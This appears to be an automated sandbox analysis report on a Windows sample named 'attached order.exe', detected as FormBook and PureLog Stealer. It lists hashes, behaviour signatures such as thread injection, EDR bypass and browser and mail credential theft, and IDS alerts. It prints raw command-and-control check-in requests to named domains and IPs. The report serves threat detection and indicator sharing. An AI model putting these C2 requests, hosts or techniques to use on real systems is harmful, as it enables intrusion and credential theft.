Windows Analysis Report
attached order.exe

Overview

General Information

Sample name: attached order.exe
Analysis ID: 1563709
MD5: 0879125fd7b75f462bc11eaebdb28445
SHA1: 54f3cbafcdc1162d30db5167f64d4b98d0ce84c4
SHA256: 3a4692716a5ddbc570a1d14328c50b7edf677631b2ac1ea9e99a77aa46de0993

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • attached order.exe (PID: 7972 cmdline: "C:\Users\user\Desktop\attached order.exe" MD5: 0879125FD7B75F462BC11EAEBDB28445)
    • attached order.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\attached order.exe" MD5: 0879125FD7B75F462BC11EAEBDB28445)
    • attached order.exe (PID: 1792 cmdline: "C:\Users\user\Desktop\attached order.exe" MD5: 0879125FD7B75F462BC11EAEBDB28445)
      • RAVCpl64.exe (PID: 7176 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cacls.exe (PID: 6932 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • firefox.exe (PID: 7932 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.16561859855.0000000009E20000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.16558585775.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.attached order.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.attached order.exe.9e20000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.attached order.exe.4c15848.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.attached order.exe.4bf5828.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.attached order.exe.4bf5828.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-27T11:28:57.522385+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49745 | 74.208.236.156 | 80 | TCP
2024-11-27T11:29:22.565445+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49749 | 84.32.84.32 | 80 | TCP
2024-11-27T11:29:36.291018+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49753 | 13.248.169.48 | 80 | TCP
2024-11-27T11:29:50.011210+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49757 | 66.29.149.46 | 80 | TCP
2024-11-27T11:30:04.014102+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49761 | 173.201.189.241 | 80 | TCP
2024-11-27T11:30:19.723076+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49765 | 43.163.1.110 | 80 | TCP
2024-11-27T11:30:34.386330+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49769 | 104.21.7.187 | 80 | TCP
2024-11-27T11:30:49.772725+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49773 | 103.230.159.86 | 80 | TCP

AV Detection

Source: attached order.exe | ReversingLabs: Detection: 34%
Source: Yara match | File source: 3.2.attached order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.attached order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.16880552732.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: attached order.exe | Joe Sandbox ML: detected
Source: attached order.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: attached order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: cacls.pdbGCTL source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cacls.pdb source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: attached order.exe, 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16883020772.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16879645325.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: attached order.exe, attached order.exe, 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16883020772.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16879645325.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\cacls.exe | Code function: 5_2_0067C940 FindFirstFileW,FindNextFileW,FindClose | 5_2_0067C940
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_035FC4BE
Source: C:\Windows\SysWOW64\cacls.exe | Code function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h | 5_2_00669E50
Source: C:\Windows\SysWOW64\cacls.exe | Code function: 4x nop then xor eax, eax | 5_2_00669E50
Source: C:\Windows\SysWOW64\cacls.exe | Code function: 4x nop then pop edi | 5_2_0066E4AE
Source: C:\Windows\SysWOW64\cacls.exe | Code function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h | 5_2_00669E46
Source: C:\Windows\SysWOW64\cacls.exe | Code function: 4x nop then mov ebx, 00000004h | 5_2_032B04BE

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49745 -> 74.208.236.156:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49749 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49757 -> 66.29.149.46:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49769 -> 104.21.7.187:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49761 -> 173.201.189.241:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49753 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49765 -> 43.163.1.110:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49773 -> 103.230.159.86:80
Source: DNS query: www.aktmarket.xyz
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | IP Address: 84.32.84.32
Source: Joe Sandbox View | ASN Name: LILLY-ASUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_03601AF8 getaddrinfo,SleepEx,setsockopt,recv,recv | 4_2_03601AF8
                      Source: global trafficHTTP traffic detected: GET /raea/?wIXhAG=PqKj/8KuIq0WSNkKBtYQxtP5ekYb45s1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVW+OdEFKSgTrNoF3hmw=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /jytl/?wIXhAG=g6hM5OfAy0aZTOdwtizvGwaLh1tc9b9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGmxIPeV05u7M1niwgNE=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /wb7v/?wIXhAG=IA0aHAKfw1DI7BcblrymbxKn4Du9G2zIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpGvOs3Qutuf7i9hpgx0=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /r2k9/?wIXhAG=R82aEe+RY/7ruopITyHmIZKE6mty2NjUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfWsMWJHlNdq0zf8f0Cc=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPxd74qpwzz3mNpUi2rk=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.iglpg.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /pfw9/?wIXhAG=45l5W170mEENNSUnzK0Z1bPSyznn87pe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF3RmeGAfM1BGU/Lu+bk=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.christinascuties.net
Source: global traffic | DNS traffic detected: DNS query: www.techmiseajour.net
Source: global traffic | DNS traffic detected: DNS query: www.aktmarket.xyz
Source: global traffic | DNS traffic detected: DNS query: www.golivenow.live
Source: global traffic | DNS traffic detected: DNS query: www.iglpg.online
Source: global traffic | DNS traffic detected: DNS query: www.1qcczjvh2.autos
Source: global traffic | DNS traffic detected: DNS query: www.gk88top.top
Source: global traffic | DNS traffic detected: DNS query: www.superiorfencing.net
Source: unknown | HTTP traffic detected: POST /jytl/ HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Host: www.techmiseajour.net | Cache-Control: max-age=0 | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 203 | Origin: http://www.techmiseajour.net | Referer: http://www.techmiseajour.net/jytl/ | User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 626 | Connection: close | Date: Wed, 27 Nov 2024 10:28:57 GMT | Server: Apache
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 27 Nov 2024 10:29:41 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 27 Nov 2024 10:29:44 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 27 Nov 2024 10:29:47 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 27 Nov 2024 10:29:49 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html; charset=utf-8
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 27 Nov 2024 10:29:55 GMT | Server: Apache | X-Powered-By: PHP/8.2.24 | X-DNS-Prefetch-Control: on | X-LiteSpeed-Tag: 844_HTTP.404 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: br | Content-Length: 8984 | Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 10:29:58 GMTServer: ApacheX-Powered-By: PHP/8.2.24X-DNS-Prefetch-Control: onX-LiteSpeed-Tag: 844_HTTP.404Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 8984Content-Type: text/html; charset=UTF-8Data Raw: 13 1d ae cc 48 4d ea 01 d0 0c 1c d7 63 9d f7 9f 96 da 17 93 49 f4 3e 54 fe 64 db 00 1a 40 a3 6f 93 be 34 f2 aa d6 1a 79 ae 43 cb 0f 36 d0 24 a4 be 06 68 1e 72 17 ab 36 4a f7 8e 36 48 36 75 94 ed df 9b 6a b6 0a 97 2b 87 10 8b d2 99 97 42 e7 90 62 29 be f0 ff 78 77 01 9c 17 20 79 06 14 66 48 89 e7 21 25 9e 87 bc 14 fe 7f 3f ec 12 00 75 e4 e5 10 4b 4f ef a2 8d b9 ec 20 b9 a1 ba bb ce ad 5b af 63 a2 26 73 ef ca 2b 7d 94 e2 dd 32 34 ed 49 b6 7d 23 83 43 83 61 09 84 70 db 37 91 35 65 c3 7d 6f c1 24 2d a5 7c f1 2e 6a 43 a6 7d 7e 2e cd 02 b2 0d d6 ab f5 31 02 1a eb 39 d6 00 49 07 5e a1 61 24 ef bf 47 80 a5 db 58 a1 7e 57 c0 7e 1c 07 09 fa 15 fb dd 40 5b 13 76 fe 6a 1f 08 fb 4c 8c ac fe 87 56 88 33 54 28 d1 44 31 53 09 81 4b a7 a9 98 b6 02 6d 00 03 42 88 01 06 56 3c 2f ac cf fd ae 6d bb 2b ac 5f fe e1 ed 17 e3 57 68 4f 8e 3d 21 b0 0f 18 d6 66 ff b2 24 78 69 05 30 95 75 db ca 76 c4 76 a3 b3 9d b7 95 54 8c 9b 02 22 b6 b3 4d 0b 78 fc ab 96 8a fa 7c c6 df bb c1 fd 38 ff d2 ec 17 f5 f5 7f be fe 47 0f ba f7 d0 9a 4a 75 d6 b7 bd 07 6d 60 30 fe af 83 f5 0a 06 d3 f4 f0 bd ea 9e e0 4e 8d 7b f8 fc fd 3d 10 64 1d c0 a9 ee a9 55 e3 9e 49 40 6e 6d ee 96 49 40 94 1b c1 d0 f5 94 6e 87 76 ed b4 59 05 29 5c 36 49 9b c3 b8 a1 96 47 8a 36 a3 88 30 37 7c 70 73 ed 98 3d 70 e5 39 e0 db 7e 84 db d3 bf 81 80 80 dd 35 c3 2e 07 27 5b 89 89 a8 fa ac 79 92 42 6e cc 04 cc d3 e9 86 8d 49 4f f9 25 8f 06 2e 37 a8 80 8f 39 2b 24 0c cd 46 bf d2 ae 5a 3e 80 68 09 59 32 a2 0f 0f 48 06 d7 a3 f5 84 de 
16 35 70 1e 5b 39 a0 2f 45 c2 fd 90 46 11 46 6f 4f 1d 30 05 15 7f 4c e8 2d d6 07 0b 74 42 41 08 9f 6d 75 52 84 2c a3 f2 bd 3c bc 1a 22 22 e6 2a 05 c6 66 5d 70 56 57 ce 2f 66 fb 83 1d cd c2 12 7f 85 20 8c 0e ae 89 29 96 34 80 d1 8d 06 ee d1 a9 d1 7c 1b 96 c2 62 68 a3 23 5d 4c 75 98 b8 60 64 3b 95 34 80 0a fd 21 55 05 88 a4 67 80 3a 1b 56 d2 6c 40 e8 43 cc df 23 8c ac ff ac dc 78 5f 03 a6 10 e2 f3 96 3c c8 3b 32 45 b6 7e 9d 1c 7e 6e 0e 3b db 89 f6 31 7f f8 e6 5e a0 0f 3a 28 a7 e0 97 de e9 5b 5a 44 19 ae cc 55 a8 07 a0 c6 69 15 ef 71 fe ba b1 dd 13 38 d3 ac 16 ba f3 64 be 2c a6 36 63 b5 5f 9c 19 46 80 3a 5d f0 a9 4e 65 90 a6 13 e2 5a 51 6f af bc 31 46 03 8b d9 56 a0 ed 77 0d f4 ca 58 82 66 e7 e8 0d 51 c9 e3 da 40 d5 ef 28 7a 15 fd fa 6f ce f6 1e 12 d5 2e 59 20 a1 1e de 33 58 bd 5a 9c 06 13 28 21 e4 4c 49 d1 d3 c9 29 72 2f 5f e5 fd 62 3d a7 b1 86 a7 6d 7f 56 f1 a7 61 bb 5d 71 b9 13 87 7b be 44 af 43 d1 06 8f 2e 55 30 9d 22 54 9f b2 73 5a d9 32 da eb b1 e9 Data Ascii: HMcI>Td@o4yC6$hr6J
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 10:30:00 GMTServer: ApacheX-Powered-By: PHP/8.2.24X-DNS-Prefetch-Control: onX-LiteSpeed-Tag: 844_HTTP.404Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 8984Content-Type: text/html; charset=UTF-8Data Raw: 13 1d ae cc 48 4d ea 01 d0 0c 1c d7 63 9d f7 9f 96 da 17 93 49 f4 3e 54 fe 64 db 00 1a 40 a3 6f 93 be 34 f2 aa d6 1a 79 ae 43 cb 0f 36 d0 24 a4 be 06 68 1e 72 17 ab 36 4a f7 8e 36 48 36 75 94 ed df 9b 6a b6 0a 97 2b 87 10 8b d2 99 97 42 e7 90 62 29 be f0 ff 78 77 01 9c 17 20 79 06 14 66 48 89 e7 21 25 9e 87 bc 14 fe 7f 3f ec 12 00 75 e4 e5 10 4b 4f ef a2 8d b9 ec 20 b9 a1 ba bb ce ad 5b af 63 a2 26 73 ef ca 2b 7d 94 e2 dd 32 34 ed 49 b6 7d 23 83 43 83 61 09 84 70 db 37 91 35 65 c3 7d 6f c1 24 2d a5 7c f1 2e 6a 43 a6 7d 7e 2e cd 02 b2 0d d6 ab f5 31 02 1a eb 39 d6 00 49 07 5e a1 61 24 ef bf 47 80 a5 db 58 a1 7e 57 c0 7e 1c 07 09 fa 15 fb dd 40 5b 13 76 fe 6a 1f 08 fb 4c 8c ac fe 87 56 88 33 54 28 d1 44 31 53 09 81 4b a7 a9 98 b6 02 6d 00 03 42 88 01 06 56 3c 2f ac cf fd ae 6d bb 2b ac 5f fe e1 ed 17 e3 57 68 4f 8e 3d 21 b0 0f 18 d6 66 ff b2 24 78 69 05 30 95 75 db ca 76 c4 76 a3 b3 9d b7 95 54 8c 9b 02 22 b6 b3 4d 0b 78 fc ab 96 8a fa 7c c6 df bb c1 fd 38 ff d2 ec 17 f5 f5 7f be fe 47 0f ba f7 d0 9a 4a 75 d6 b7 bd 07 6d 60 30 fe af 83 f5 0a 06 d3 f4 f0 bd ea 9e e0 4e 8d 7b f8 fc fd 3d 10 64 1d c0 a9 ee a9 55 e3 9e 49 40 6e 6d ee 96 49 40 94 1b c1 d0 f5 94 6e 87 76 ed b4 59 05 29 5c 36 49 9b c3 b8 a1 96 47 8a 36 a3 88 30 37 7c 70 73 ed 98 3d 70 e5 39 e0 db 7e 84 db d3 bf 81 80 80 dd 35 c3 2e 07 27 5b 89 89 a8 fa ac 79 92 42 6e cc 04 cc d3 e9 86 8d 49 4f f9 25 8f 06 2e 37 a8 80 8f 39 2b 24 0c cd 46 bf d2 ae 5a 3e 80 68 09 59 32 a2 0f 0f 48 06 d7 a3 f5 84 de 
16 35 70 1e 5b 39 a0 2f 45 c2 fd 90 46 11 46 6f 4f 1d 30 05 15 7f 4c e8 2d d6 07 0b 74 42 41 08 9f 6d 75 52 84 2c a3 f2 bd 3c bc 1a 22 22 e6 2a 05 c6 66 5d 70 56 57 ce 2f 66 fb 83 1d cd c2 12 7f 85 20 8c 0e ae 89 29 96 34 80 d1 8d 06 ee d1 a9 d1 7c 1b 96 c2 62 68 a3 23 5d 4c 75 98 b8 60 64 3b 95 34 80 0a fd 21 55 05 88 a4 67 80 3a 1b 56 d2 6c 40 e8 43 cc df 23 8c ac ff ac dc 78 5f 03 a6 10 e2 f3 96 3c c8 3b 32 45 b6 7e 9d 1c 7e 6e 0e 3b db 89 f6 31 7f f8 e6 5e a0 0f 3a 28 a7 e0 97 de e9 5b 5a 44 19 ae cc 55 a8 07 a0 c6 69 15 ef 71 fe ba b1 dd 13 38 d3 ac 16 ba f3 64 be 2c a6 36 63 b5 5f 9c 19 46 80 3a 5d f0 a9 4e 65 90 a6 13 e2 5a 51 6f af bc 31 46 03 8b d9 56 a0 ed 77 0d f4 ca 58 82 66 e7 e8 0d 51 c9 e3 da 40 d5 ef 28 7a 15 fd fa 6f ce f6 1e 12 d5 2e 59 20 a1 1e de 33 58 bd 5a 9c 06 13 28 21 e4 4c 49 d1 d3 c9 29 72 2f 5f e5 fd 62 3d a7 b1 86 a7 6d 7f 56 f1 a7 61 bb 5d 71 b9 13 87 7b be 44 af 43 d1 06 8f 2e 55 30 9d 22 54 9f b2 73 5a d9 32 da eb b1 e9 Data Ascii: HMcI>Td@o4yC6$hr6J
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 27 Nov 2024 10:30:09 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 
